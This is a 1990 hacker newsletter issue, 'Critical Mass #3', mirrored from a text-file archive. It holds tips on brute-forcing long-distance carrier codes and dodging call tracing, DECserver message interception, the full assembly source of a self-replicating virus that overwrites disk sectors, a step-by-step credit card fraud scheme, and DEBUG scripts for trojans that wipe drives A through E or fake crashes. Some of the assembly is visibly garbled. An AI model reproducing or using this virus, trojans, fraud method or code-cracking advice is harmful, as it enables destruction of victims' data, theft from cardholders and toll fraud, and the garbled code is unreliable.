💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › CRITICAL › critical.3rd captured on 2022-06-12 at 10:43:31.

View Raw

More Information

-=-=-=-=-=-=-

 _____________________________________________________________________________ 
 \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
  \        Critical              Issue # 03       A Technical Text          /
   \         Mass               ~~~~~~~~~~~       File Newsletter.         /
    \________________________________|____________________________________/
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                        __________________________
      __________        l___________ | ___________l
     //         \   _______   _____ l|l _____     ______              ___
    // /~~~~~~~\_\  l      \  l   l l|l l   l    //     \      _      l l
   // /             l  []  /  ~l l~ l|l ~l l~   // /~~~\_\    / \     l l
  <<<<   ritical    l     /    l l  l|l  l l   // /          /   \    l l
   \\ \             l    <     l l  l|l  l l  <<<<          / ___ \   l l
    \\ \_______/~/  l  l\ \    l l  l|l  l l   \\ \____/~/ / /   \ \  l l_____
     \__________/   l__l \_\  l___l l_l l___l   \_______/ /_/     \_\ l_______l

              ==-->                              ==-->
    ____    __    ____           ==-->                         (12/29/90)
    l   \        /   l  ass              ==--> 
    l    \      /    l      __        ______     ______ 
    l     \    /     l     /  \      /      \   /      \      A Technical 
    l  l\  \  /  /l  l    /    \    / /~~~~~~  / /~~~~~~  text file newsletter
    l  l\\      / l  l   / ____ \   \ ~~~~~~/  \ ~~~~~~/  ~~~~~~~~~~~~~~~~~~~~
    l  l \\____/  l  l  / /    \ \   ~~~~/ /    ~~~~/ /        Issue: 3
    l  l          l  l /_/      \_\ /~~~~ /    /~~~~ /
    ~~~~          ~~~~              ~~~~~~     ~~~~~~


 _____________________________________________________________________________
 l     Writters             l Special thanks to....                          l
 l__________________________l________________________________________________l
 l                          l                                                l
 l     The Beaver           l  Abigal, Shadow, The Nut-Kracker, Pink Floyd   l
 l     Zap                  l  Zap, Robo, and many others!                   l
 l__________________________l________________________________________________l

 

 * Note: We, the writters and editors, of this text newsletter are not 
         respossible for any injuries or prosocutions due to the information
         giving in this text.

                         EXPERIMENT AT YOUR OWN RISK!

         Anybody who is willing, can submit an article! If you wish to
         submit an article, please e-mail either 'The Beaver' or the 'Nut-
         Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All
         sysops can freely download this text in the terms that it is not
         altered and none of the credits are change. So.................
         please act like a human! Also, for your convience,
         every now and then a 'volume' of the Critical Mass is
         created. That is, after three to five issues (roughly 50k to 70k
         of text) a compiled text will be made containing the past issues,
         so if you have missed any issues,you can download the volume you need.
         In order for this text to keep on being produced, you the reader
         needs to submit, either it be by asking questions (Which will 
         sometime be included in the text) or by submitting and article.  
         Any articles on Hacking, Fone Phreaking, Credit Card Surfing, 
         Pirating, Chemistry, etc. our welcome. Any general 'not accepted'
         material is accepted here! Artcles can be on anything from 'how
         to rip off this type of coke machine' to 'how to build a Axis bomb
         from spare car parts'. We hope you enjoy the information given and
         find some use for it.

 
        /\
       /\/\           Chief Editor             Brought To You By
      /\/\/\          ~~~~~~~~~~~~~               Members of
     /\/\/\/\          The Beaver                   (SC/HA)
    /\/\/\/\/\       
   /\/\/\/\/\/\
  /\/Critical\/\     
  \/\/\Mass/\/\/         (SC/HA)  
   \/\/\/\/\/\/
    \/\/\/\/\/
     \/\/\/\/
      \/\/\/
       \/\/
        \/


 ______________________________________________________________________________
 l          This issue contains articles of the following.....                l
 l____________________________________________________________________________l
 l                                                                            l
 l  I.    Editorial written by 'The Beaver'.                                  l
 l  II.   Part III of Hacking DECservers (Last One!) by 'The Beaver'          l
 l  III   IBM Destruction! Part III by 'The Beaver'                           l
 l  IV.   Credit Card Fraud part I Written By The Beaver                      l
 l  V.    Quick COM Trojan Referance, by 'Zap'                                l
 l____________________________________________________________________________l


 ______________________________________________________________________________
 l                           Todays Topic Is.......                           l
 l                           Written By The Beaver                            l
 l____________________________________________________________________________l



         Oh, the things to talk about and the things to hack. There are so
many, yet so little time. The things this text could bring up. The potental.
I love it. Here's something intresting, I here that a few hackers in the 
Atlanta area just got the 'IBM Home Destruction Kit v1.4', and there enjoying
it very much. This is good, and be watching out for version 2.0. As you read
this, the 'SC/HA Hacker ToolBox v3.0', should be out. Get it today. Lately,
my big thing has been LD carriers. What great little toys the fone company
offers hackers. Tonight, I was just reading the this Anarchist newletter
(I got it off of The Reactor BBS (904)878-1736), or ATI_#50, in which they
where talking about LD carriers. After reading the artical, which did have
very good info, they went into talking about using other peoples accounts
on these and how you could get caught. I like the articles they write, but yet
I beg to differ. Considering most carriers are wats lines, that blows that 
theroy to hell if you ask me. Still if you get the chance, do get it. Also 
get ANY newsletters from.........

TAPP
2600

         These are top of the line hack stuff here. To get more info on them,
download ATI_#50. Any rate, I've been hack'in on these lately, cause I've
been feeling a little unsure about a system and about hacking it direct, so
instead of finding a in/out modem that will support it, I'm using LD carriers.
If you ask me they are easy to hack and VERY useful. They tell you the majority
of the time when you enter a wrong account, and sence your using a touch tone
fone, you only have 0-9 to worry about, plus the uses of the # and * key. For
more info just download ATI_#50. Anyrate, here are a few LD carriers........


(800)547-1784       6 digit code
(800)882-2255       ? ????? ????
(800)437-7010       8 digit code
(800)325-1337       6 digit code
(800)327-9488       6 digit code

          Hell, you can get carriers out of the fone book. You don't even need
a computer to hack'em! It can help though. This is the best way to hack them
by computer that I know of. Set you system up to try codes then a fone number 
you know that has a carrier. If the code is invalid, your NOT going to get a 
carrier right? If it is, you got a account! The SC/HA ToolBox Hacker will
do this for you, so give it a shot!

          Also, I've been hacking on a 'Centel Packet', any information that 
you know about these network systems, please e-mail me at 'Warriers Retreat'.
(904)422-3606 or 'The Reactor BBS'(904)878-1736.



          As I sit here at my terminal, I'm listing to U.S forces fight a 
'war' as of this date. In case your wondering I'm refering to the Kuwait
'leberation'. Now I know what your thinking, what does this have to do with 
hacking. While listing to the radio, I decided to do a wargame in the 224 area
prefix, when my wargame dialer was interrupted by the fone ringing. I picked
up to have a lady ask if I had just called her house. I said 'Ya, I sure did,
you see I was using my computer to call a friend and I dialed the wrong number
, sorry'. She stated that 'Oh, its alright, but its rude to hang up on people 
like that, tell them you got the worng number.'. I said 'sorry, bye'. As you
may know, the Centel offers call tracing. Its neat for them, but not for us 
hackers. When wargaming, you can usually get away wih what I just did with 
some old lady. This gave me a few tips that I thought I would pass on to less
experiance hackers. 

1.  Dial about 100 to 200 Max. Never more. The fone company starts to think 
    after a while, but you have nothing to worry about as long as you stay in
    that range. 40 to 60 numbers max on WATS lines. The fone company will 
    really start to think if you dial 1000 WATS lines. Think about it.
2.  Keep you wargaming to a minimum. Im bad about this rule. 
3.  When caught by someone like above, don't worry, just play it off. If you
    do your wargaming at night, you stand less of a chance that call tracing 
    will be used. People are tired. Also it cost four bucks per trace. 
4.  Once you have a list of good systems you would like to hack, keep it at
    that. Also, find other people that wargame and exchange numbers. This 
    cuts back on wargaming and keeps you both in good shape. 

         Remember these rules! 

    Computer hackers are a dying breed in our area, so if you truely hack, 
be proud but careful. 

                                    ---==<Beaver>==---


P.S. - Heres a funny note. A friend of mine left his wardialer running with 
       no end to dialing and dialed over 2000 numbers. His line was cut and 
       he had to call the operator and get it turned back on. Its not really
       against the law to wargame, but in a way it is considered harrassment
       , so in a way it is. I won't mention how it was, but it was funny.

P.S.S- In this issue, there WAS going to be a artical on cracking commie 
       software by the Shadow, but SOMEBODY got to involved in another project
       and hasn't finnished it yet. Look for it in CM#4


                  ________________________________________
                  l                                      l
                  l         Hacking DECservers           l
                  l              Part III                l
                  l             Last Part!               l
                  l                                      l
                  l             The Beaver               l
                  l______________________________________l


   Ok guys, here it is, the finnal part to hacking DEC servers! This is 
the last of the info about them, except maybe for a little tidbits of info
here and there. First off, It would be wise to read parts I, II, and III. 
Those are in issues CM#1, CM#2, and of course this one. Lets kill the small 
talk and get on with it!


   Ok, we all know how to broadcast messages from port to port right? Well I
hope so, anyway, I bet that you thought that broadcast was a pretty secure
method of sending messages, that is that another port won't recieve messages
that you send to a different port. Well, don't think this, they CAN be recieved
so be careful. Heres how YOU can intercept messages on a privleged account.
First, set up a service. Fake that is. So type the following........

set service (service name)

  This will create a service, but in its current state, you can't connect to
it. So we must enable the service for all or certain ports, like thus.....

set service (service name) port (port number)

  Now you can connect to it. You may want to make a identifier like thus......

set service (service name) ident "(identifier here)"

  This makes it look nice and neat. Now if you connect to this service you
will note that nothing happens, BUT if someone sends a message, you will
recieve it, because as far as we can figure, your looking into message buffer.
You will get none of the 'From port' such and such, but just the message. No
matter where it comes from. Pretty neat huh?


  As for the decoy Idea, we have yet to find a reliable way to set one up. When
we figure out how the maintenance password system works we can probably use a
compiler or interpreter to create one. Till then....... Well, it looks like 
part III is a little short so sorry, but all the info you got in the past 
parts should be more than enough to keep you very busy.

  Before we end, I would like to thank a few DECserver hackers who helped with
hacking and ideas about this type of system......... Namely............

Shadow, The Nut-Kracker, Abigal, Gator off of UFnet, Mentalist, and many others.

Chow..............

                                          ---==<Beaver>==---



                     ___________________________________
                     l                                 l
                     l        IBM Destruction          l
                     l           Part III              l
                     l                                 l
                     l          The Beaver             l 
                     l_________________________________l


Well, here's part III!!!!!! So far we have talked about the following.......

Trojans.....
-------------

Destroying disks on all drives, including drive C:
Creating Fales Keyboard Errors
Creating Faler Disk Errors
Simulating System Crashes
Creating Trojans in TXT files by remapping key thur the ANSI driver
Etc, Etc

Viruses.....
-------------

Creating a EXE to COM infector logical virus in basic.
Creating a EXE to EXE infector logical virus in basic.
Creating a Batch file virus
Etc, Etc


           Now the trojan section goes pretty deep, but the virus section is 
still shallow. So this is a 500 byte code of a overwritting TRUE virus. It 
comes with remarks, but they can be taken out. Thats all there will be for 
part III, cause the code is VERY long........



page 70,120
Name    Virus
;***************************************************************************

;    Program Virus                         Ver:        1.1
;    Copyright by R. Burger 1986
;    This is a demostration program for computer
;    viruses. It has the ability to replicate itself,
;    and thereby modify other programs
;***************************************************************************



Code    Segment
        Assume    CS:Code
progr   equ       100h
        ORG        progr

;***************************************************************************

;     The three NOP's serve as a marker byte of the 
;     virus which allow it ot identify a virus
;***************************************************************************

MAIN:
        nop
        nop
        nop

;***************************************************************************

;      Initialize the pointers
;***************************************************************************

        mov ax,00
        mov es:[pointer],ax
        mov es:[counter],ax
        mov es:[disk],al

;***************************************************************************

;      Get the selected drive
;***************************************************************************

 
        mov ah, 19h                      ;drive?
        int 21h

;***************************************************************************

;      Get selected path on the current drive
;***************************************************************************

       mov cs:drive,al            ; save drive
       mov ah,47h                 ; dir?
       mov dh,0 
       add al,1
       mov dl,al                  ; in actual drive
       lea si,cs:old_path
       int 21h 

;***************************************************************************

;      Getting the number of drive present
;      If only one drive is present, the pointer for
;     search order will be set to search order +6
;***************************************************************************

       mov ah, 0eh                ; how many drives
       mov dl,0                   ;
       int 21h

       mov al,01
       cmp al,01                  ;one drive?
       jnz hups3
       mov al,06

hups3: mov ah,0
       lea bx,search_order
       add bx, ax
       add bx, 0001h
       mov cs:pointer,bx
       clc

;***************************************************************************

;      Carry is set, if no more .COM's are found.
;      Then, to avoid unnessar work, .EXE files will
;      be renamed to .COM files and infected.
;      This causes the error message "Program too large
;      to fit in memory" when starting larger infected 
;      EXE files
;***************************************************************************

change_disk:
       jnc no_name_change
       mov ah,17h
       lea dx,cs:maske_exe
       int 21h
       cmp al, offh
       jnz no_name_change ; .EXE found?


;***************************************************************************

;      If neither .COM nor .EXE is found, then sectors will
;      be overwritten depending on the system time in 
;      millisecounds. This is the time of the complete
;      "infection" of a storage medium. The virus can find
;      nothing more to infect and starts its destruction.
;***************************************************************************



       mov ah, 2ch             ; read system clock
       int 21h
       mov bx,cs:pointer
       mov al,cs:[bx]
       mov bx,dx
       mov cx,2
       mov dh,0
       int 26h                 ; write crap on disk

;***************************************************************************

;      Check if the end of the search order table has been 
;      reached. If so, end
;***************************************************************************

no_name_change
       mov bx,cs:pointer
       dec bx
       mov cs:pointer,bx
       mov dl,cs:[bx]
       cmp dl,0ffh
       jnz hups2
       jmp hops

;***************************************************************************

;      Get new drive from the search order table and 
;      select it.
;***************************************************************************

hups:
       mov ah,0eh
       int 21h                      ; change disk

;***************************************************************************

;      Start in the root directory
;***************************************************************************

       mov ah,3bh                   ; change path
       lea dx,path
       int 21h
       jmp find_first_file

;**************************************************************************

;      Starting from the root, search for the first subdir
;      first convert all .EXE files to .COM in old 
;      directory.
;**************************************************************************

find_first_subdir:
       mov ah,17h              ; change exe to com
       lea dx,cs:maske_exe
       int 21h
        mov ah,3bh             ; use root dir
        lea dx,path
        int 21h
        mov ah,04eh            ; Search for first subdirectory
        mov cx,000100001b      ; dir mask
        lea dx,maske_dir          ;
        int 21h                ;
        jc change_disk

        moc bx,CS:pointer
        INC BX
        DEC bx
        jz use_next_subdir

;**************************************************************************

;       Select found directory
;**************************************************************************

use_next_subdir:
        mov ah,2fh                ; get dta address
        int 21h
        add bx, 1ch
        mov es:[bx],'\ '          ; address of name in dta
        inc bx
        push ds
        mov ax,es
        mov ds,ax
        mov dx,bx
        mov ah,3bh                ; change path
        int 21h
        pop ds
        mov bx,cs:counter
        inc bx
        mov CS:counter,bx

;**************************************************************************

;       Find first .COM file in the current directory.
;       If there are none, search the next directory
;**************************************************************************

find_first_file:
        mov ah,04ef               ; Search for first
        mov cx,00000001b          ; mask
        lea dx,maske_com             ;
        int 21h
        jc find_first_subdir
        jmp check_if_ill

;*************************************************************************

;       If the program is already infected, search for 
;       the next program.
;*************************************************************************

find_next_file
        mov ah,4fh               ; search for next
        int 21h
        jc find_first_subdir

;*************************************************************************

;       Check if already infected by the virus.
;*************************************************************************

check_if_ill;
        mov ah,3dh               ; open channel
        mov al,02h               ; read/write
        mov dx,9eh               ; address of name in dta
        int 21h
        mov bx,ax                ; save channel
        mov ah,3fh               ; write in buffer
        mov cx,buflen            ;
        mov dx,buffer            ; write in buffer
        int 21h
        mov ah,3eh               ; close file
        int 21h

;*************************************************************************

;       Here we search for three NOP's.
;       If present, there is already an infection. We must
;       then continue the search.
;*************************************************************************

        mov bx,cs:[buffer]
        cmp bx,9090h
        jz    find_next_file

;*************************************************************************

;      Bypass MS-DOS write protection if present
;*************************************************************************

       mov ah,43h             ; write enabled
       mov al,0
       mov dx,9eh             ; address of name in dta
       int 21h
       mov ah,43h
       mov al,01h 
       and cx,11111110b
       int 21h

;*************************************************************************

;      Open for read/write access
;*************************************************************************

       mov ah,3dh            ; open channel
       mov al,02h            ; read/write
       mov dx,9eh            ; address of the name in dta
       int 21h

;************************************************************************

;      Read date entry of program and save for future use.
;************************************************************************

       mov bx,ax             ; channel
       mov ah,57h            ; get date
       mov al,0             
       int 21h

;************************************************************************

;      The jump located at address 0100h of the program
;      will be saved for future use.
;************************************************************************

       mov dx,cs:[conta]    ; save old jmp
       mov cs:[jmpbuf],dx
       mov dx,cs:[buffer+1] ; save new jmp
       lea cx,cont-100h
       sub dx,cx
       mov  cs:[conta],dx

;*************************************************************************

;      The virus copies itself to the start of the file.
;*************************************************************************

       mov ah,40h           ; write virus
       mov cx,buflen        ; length of buffer
       mov dx,main          ; write virus
       int 21h

;*************************************************************************

;      Enter old creaion date of file.
;*************************************************************************

       mov ah,57h           ; write date
       mov al,1
       pop dx
       pop cx               ; restore date
       int 21h

;************************************************************************

;      Close the file.
;************************************************************************

       mov ah,3eh          ;  close file
       int 21h

;************************************************************************

;      Restore the old jump address.
;      The virus saves at address "conta" the jump which
;      was at the start of the host program.
;      This is done to preserve the execubility of the 
;      host program as much as possible.
;      After saving it still works with the jump address
;      contained in the virus. The jump address in the 
;      virus differs from the jump address in memory
;
;************************************************************************

       mov dx,cs:[jmpbuf]    ; restore old jmp
       mov cs:[conta],dx
hops:  nop
       call_use_old

;************************************************************************

;      Continue with the host program
;************************************************************************ 

cont   db 0e9h
conta  dw 0
       mov ah,00
       int 21h

;************************************************************************

;      Reactivate the selected drive at the start of the
;      program.
;************************************************************************
       
use_old:
       mov ah,0eh               ; use old drive
       mov dl,cs:drive
       int 21h

;************************************************************************

;      Reactivate the selected path at start of the 
;      program.
;************************************************************************

       mov ah,3bh              ; use old dir
       lea dx,old_path-1;get old path and backslash
       int 21h
       ret


search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
pointer      dw   0000            ; pointer f. search order
counter      dw  0000             ; counter f. nth. search
disks        db   0               ; number of disks



maske_com  db  "*.com",00           ; search for com files
maske_dir  db  "*",00               ; search for dir's
mask_exe   db  0ffh,0,0,0,0,0,00111111b
           db  0,"???????exe",0,0,0,0
           db  0,"???????com",0
           db  0ffh,0,0,0,0,0,00111111b
           db  0,"????????????",0,0,0,0
           db  0,"?????????com",0

buffer equ 0e000h                  ; a safe place

buflen equ 230h                    ; length of virus !!!!!!!
                                   ;         careful
                                   ;     if changing !!!!!!!

jmpbuf equ buffer+buflen           ; a safe place for jmp
path   db "\",0                    ; first path
drive  db 0                        ; actual drive
back_slash db "\"
old_path  db 32 dup(?)             ; old path

code   ends

end main



          This virus must be running one DOS 2.11 or higher. the virus can be
made shorted by removing all remarks, extra segment calls.humps, etc. It was 
written by the world known virus expert R.Burger, in 1986. Have fun!


                                     ---==<Beaver>==---





                    _____________________________________
                    l                                   l
                    l        Credit Card Fraud          l
                    l              Part I               l
                    l            The Beaver             l
                    l___________________________________l




         I'm not very into this type of stuff, or at least for the last few
years, but it is amazing how easy credit card fraud is. For about 3 to 4
years, I did do the following that I am about to mention and was never caught.
I must warn you the read that never the less this is a very risky game. 
Actually, it is far from a game, but is actually very easy to get away with.
If you must use the information given, please make it something worth while.
Don't use credit card fraud for a neat game you saw in 'Compute' magazine,
but rather something you need. I must also note that when you do this, 90%
of the time, the guy or girl you ripped off never has to pay for the goods
you got but rather the card company that you used. Here we go............


          To preform credit card fraud you need no computer, just a few 
magazines and a card number. Here is the way we use to run things when I 
did it step by step.

           All you need is a credit card number, experation date, and the 
name of the credit card holder. In case your wondering where this information
can be found, its all around you every day. If you have a very photographic
memory, you can obtain all you need at a store, but like most, you probably
can't memorize 16 to 13 digits, the card holders name, and the experation 
date. In this case, you can usually goto a store that is closed and dig though
the trash late at night. In the trash you should find 'carbons', or the 
transfering screen. These are black and when pressed upon tranfer all charaters
to another piece of paper. For example, if you take a carbon and put it over
a piece of paper and write your name on the carbon, it will also be written 

on the piece of paper as well as the carbon. In this case it goes paper-carbon
-paper, so that a copy goes to the customer and a compy to the store and the
carbon is thrown away. When you dig through the trash, you find the carbons and
when held backwards in the light, you can see all the information you need to 
preform credit card fraud. On the carbon, as said before, you will see a 16
to 13 digit number. This is there credit card number. If it is not 13 to 16 
digits, something is wrong, so don't use it. Here are the two most popular 
formats. 

4XXX-XXXX-XXXX-XXXX
5XXX-XXXX-XXXX-XXXX

       Theses are you basic 16 digit formats. The 'X's signify other numbers.
Whats so important about the '4' and '5' are that they tell what type of card
they are. For instance, a credit card that start with '4' is a VISA card, and
a credit card that starts with '5' is a MASTERCARD. All cards run by this 
format. For example, I think cards that start with '3' are DISCOVER cards, but
at this point, because its been so long, I can't remember. But that is what 
tells each card apart. Remember this, this is important information. Just
remember, you must AT LEAST have the card holders name, experation date and
card number. Sometimes you need this and there address and phone number, but
sometimes you can get by without them. Try to get all the information you can
get on them, the more you have the more it helps. 

          The next step we took was simply looking in magazines and finding
things we wanted and needed. We would write down the price and the phone 
numbers. We DID NOT CALL THEM THEN, but later. Just keep reading you'll see
why.

          After this, we found a empty house that was for sale and we knew 
would be open for at least a week. We would look in the 'home buyers guide'
and check out houses. When we found one, we would copy the address and the 
next phase would take place.

          This phase consisted of calling the places that we wanted to order
stuff from and ordering UPS. Early on in our credit card scams, we tried
sending it US mail, but you will never get it. The reason it works with UPS
is because they leave it on the door step if it is pre-paid for, which in this
case it is. NOTE: When the orders where placed, we would send the stuff too
the house for sale (we nobdy lived), this is where the trick and the risk
comes in.

           In about a week, the stuff we ordered would show up at the door
step of the house we order it from. We would check at the house three days
after we had order them ever day. The risk is when you pick up the goods. 
Actually, at the worst, the card holder can only find out a week after it 
happened, because the billing lags behind the order, so actually the risk is 
slim, but there is still a risk. We would simply go there at night, scope out
the area and grab the stuff. As I said, the risk is not very much, but in 
my opinion, there is still a risk involved, bu thtat is only in the pick up.


TIPS: When you order the goods, all you should be asked is what you want, 
      the card type (note the top and see way thats important!), experation
      date, you name (the card holders name OF COURSE!), and the address
      (the empty house). When the mail order house asks your social security
      numbers and other stange questions, something fucked up. You don't have
      the correct information. Just simply hang up, also ONLY DO YOU ORDERING
      ON WATS LINE. They can't (or at least have to have tons of time to trace
      , about 5 to 8 hours to be exact) trace, where if you order in you area
      it takes about millisecound.
 
      What you just read is the bare basics of credit card fraud. Its that
      easy! Thats why I don't have or want a credit card, even though they are 
      becoming a standard. 

      Part II will cover the use of merchant numbers and some other advanced
methods of credit card fraud. Chow!

                                   ---==<Beaver>==---



    
          



              The Trojan and Virus Quick Reference Guide
		       Information by: The Beaver
                            Written By: Zap
                        From Critical Mass Issue #1
			
--------------------------------------------------------------------------------


Trap Disk Access
    
a100
mov ah, 35
mov al, 4
int 21                                 
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 13
int 21                                 
mov ax, 0
int 21
                        <--- This Space must be here!
r cx
15
n (Enter a name you want the compiled file to be).COM
w
q

 
--------------------------------------------------------------------------------


Fake System Crash

a100
mov ah, 35
mov al, 4
int 21
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 9
int 21
mov ax, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q

-------------------------------------------------------------------------------

Trap the Key Board

a100
mov ah, 35
mov al, 4
int 21
mov ax, es
mov dx, bx
mov ds, ax
mov ah, 25
mov al, 13
int 21
mov ax, 0
int 21
                        <--- This Space must be here!
r cx
15
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Destroy Disk A:

a100
mov ah, 5
mov dl,0 0
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Destroy Disk B:

a100
mov ah, 5
mov dl,0 1
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


Destroy Disk C:

a100
mov ah, 5
mov dl,0 2
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Destroy Disk D:

a100
mov ah, 5
mov dl,0 3
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Destroy Disk E:

a100
mov ah, 5
mov dl,0 4
mov dh, 0
mov ch, 0
mov cl, 1
mov al, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q




Lock up Drive A:

a100
mov ah, 35
mov dl, 0
mov dh, 0
mov ch, 80
mov cl, 1
mov ah, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Lock up Drive B:

a100
mov ah, 35
mov dl, 1
mov dh, 0
mov ch, 80
mov cl, 1
mov ah, 8
int 13
mov ah, 0
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q


--------------------------------------------------------------------------------


Triple Program Load Time

a100
mov ax, 0
mov ds, ax
mov bx, 522
mov ah, ff
mov (bx), ah
xor ax,ax
int 13
mov,00
int 21
                        <--- This Space must be here!
r cx
16
n (The name you want the compiled file to be).COM
w
q




NOTE: MAKE THESE INTO  ASCII FILES
      AND THEN FROM A DOS PROMPT
      TYPE THE FOLLOWING...

DEBUG < (The name of the file)

I.E. if this was an ASCII file called
DISKACC.TXT I would type the
following:

DEBUG <DISKACC.TXT



            
                        DECServer and EMULEX server
                             Quick Referance
-------------------------------------------------------------------------------

       All of the following commands can be used directly on DEC200, DEC300 
DECServer's in general, and EMULEX machines. This is you quick reference guide
to them!


Command        Short Hand       Comment
-------        ----------       ---------------------------------------------

Show Users     sh u             Shows all users online
Show Port      sh por           Shows you port
Show Port (#)  sh por (#)       Shows a specific port number
Broadcast      bro por (#)      Sends a message to a specific port
Show Server    sho server       Displays info on the server
Show Node      Sho no           Displays info on nodes
Connect        C                Connects to a server or node.
Set server pas Set server pass  Set server password (priv only)
Set inactivity set inact        Set inactivity to enabled or disabled(e/d)(priv
                                only)
logout         lo               logouts your port
logout port(#) lo por (#)       logouts a specific port # (priv only)
zero           ze               Zeros server counters
Set node       set nod          Sets a node e/d (priv only)
Clear          Clea             Kills a service or node (priv only)
Purge          Purg             Kills a service or node (priv only) from dbase
Show Counters  sh count         displays server counters
Set service    set servi        creates a service


         For more info, type help at the 'local' prompts of these types of 
servers!

                                  ---==<Beaver>==---




                        _____________________________
                        l                           l
                        l    Letters And Replies    l
                        l___________________________l


          As before, here are some letters recieved and here are some replies.
If you have a question, E-mail me at 'The Reactor BBS' (904)878-1736 or
'Warriers Retreat BBS' (904)422-3606. Also, all letters are annonymous unless
you state other wise!



From: XXXXXXXXXXX                Read: 25 times  [1 Reply]
Subject: Beaver

Hello Monsieur Beaver,

I have some suggestions for CM.  Give more details when describing how to do
stuff.  Some of your info was excellent, but at times it was not enough.  Is
there a number where I can reach you voice?



Ok, your right, sometimes the information does go a little far and not
that well explained, but when Im writting, I tend to think that the reader
is a hacker and already knows alot of the stuff, so I get carried away,
assuming that everybody understands the things I leave out. If you have any
questions, drop me a line. Im sorry but I don't give out my fone number to
strangers.
Sorry! Chow!........


                                  ---==<Beaver>==---



By:XXXXXXXXXXXXXXX


       Beaver,
              What new features will the 'IBM Destruction Kit v2.0' have that
version 1.4 doesn't have?


       After writting version 1.4, I relized the versitity as a 'kit' was 
very little, sence it only created just the file you asked for. So all you
could create was a 'drive C destroyer' and not a 'keyboard traping, drive A,
B, and C destroyer' in one shot. With version 2.0, you can do this. Also,
the files where in assembly and adveraged about 20 bytes. Thats pretty short
to be a 'neat game', or what not, so I added in the options of putting in
nop's to waste space to make the file appear longer. Actually, the first part
of the program are all that counts though. I also added a few other features
I think you guys will like. You can get it from 'The Reactor BBS' under the 
name 'grind2.zip' when it comes out!


From: XXXXXXXXXXX 

Hello once again,

I understand about the phone number (not giving it out).  The only problem
is, I don't feel comfortable asking you questions about FIRN on this or any
other BBS.  I don't want people complaining about me on this board.  I would
like to keep a good status with the users and the sysop so I can keep up the
message reading and file getting.  Know what I mean?   I have been trying to
get a priv account on so many things on FIRN, but I can't get one.  I have
been trying every night for the past week (since I read your article).
I have no problem getting on to FIRN and connecting to FAU Ethernet and then
connecting to a service.  The only problems I have arise when username and
password prompts arise.  I am an 18 year old FSU computer science major.
I wish we had different ways to communicate (non-BBS)



    I can be contacted most every night on 'call 202' off of UFnet. If you
can 'hold you horses' I can almost always be reached there, anlong with a 
few other hacker friends of mine. Just do the following.

Call FIRN (488-0650)
Press 'A'
Type 'UFNET'
At the '#' prompt type 'call 202'
Then type 'sho u' (shows users currently online)

If im on you will see the name 'beaver' and to the left of that the port number
To send me a message type: bro por (#) "Msg. here"    


E.G
      bro por 7 "hello beaver how are you"


      Also, I have found when using terminals like 'pc-talk' I can't use 200
either. the only thing I can suggest is to use a ANSI comp. terminal or a 
vt52 or vt100 terminal. 

                                    ---==<Beaver>==---



                     _________________________________
                     l                               l
                     l         Finnal Notes          l
                     l_______________________________l


          Well, once again we come to the end of another issue of Critical 
Mass. Here is what you can probably (I stress probably) expect in the next
issue. 

  Hacking UNIX/SUN's and VAX's
  Kracking Commie Software
  The IBM Home Destruction part V 

          And MUCH more, but you'll just have to wait and see. Also, a 
software update. The 'IBM Home Destruction Kit' is being merged with the 

'The SC/HA Hacker Toolbox'. So there will be no version 2.0 of the 'IBM 
Home Destruction Kit'. Heres what 'The SC/HA Hacker ToolBox V3.1' will 
have........

           Online and Offline Trojan Kit with....
                      Drive A,B,C,D kills
                      Simulated Errors
                      ANSI Remapping
                      Simulated Crashes
                      Multiple task trojan creator
                      Much MORE!
           File Tranfer's in.....
                      XModem
                      Ymodem
                      ASC Buffering
           LD Carrier code finer
           Dbase hacker with.....
                      470+ popular passwords
           A 'Fall in' term for those nets

           And about a ton more! Like Terminal Emulations, and other things!


           ALSO: I had tons of question about hacking DECservers so I and
a few other people are going to put together a text file explaining every
detail on the basics of DECservers along with hacking them. I have no idea
when it will be out though........


           Shadow has been working on a simular kit for the Amiga and I here
that another friend of mine is thinking about writting a simular term for the
c64. We'll see. Any rate, happy hack'en and stay away from those modem 
police!


          Thanx To: Pink Floyd (for that UNIX info), Shadow, Abigail, Robo
                    for forwarding mail, My dad again for ideas, and 
                    many others

      No Thanx Too: The usual assholes, you know how you are!



                                 ---==<Beaver>==---
I